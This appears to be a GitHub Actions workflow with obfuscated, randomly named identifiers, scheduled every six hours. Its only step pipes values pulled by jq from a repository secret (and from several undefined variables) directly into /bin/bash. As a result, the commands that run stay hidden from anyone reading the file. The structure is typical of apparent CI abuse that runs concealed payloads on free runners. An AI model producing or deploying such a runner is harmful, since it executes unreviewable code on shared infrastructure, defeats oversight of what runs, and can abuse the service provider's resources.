name: duanlinxi6718
on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanlinxi6718
        env:
          yv3: ${{ secrets.yv3 }}
        run: |
          echo $yv3 | jq -r .jq649 | /bin/bash
          echo $dfx050 | jq -r .u98059 | /bin/bash
          echo $y60 | jq -r .xu445 | /bin/bash
          echo $i836 | jq -r .v38 | /bin/bash
          echo $raxbc32924 | jq -r .vyhc5211 | /bin/bash
          echo $hu3 | jq -r .apkp78 | /bin/bash
          echo $huc0 | jq -r .cc15803 | /bin/bash

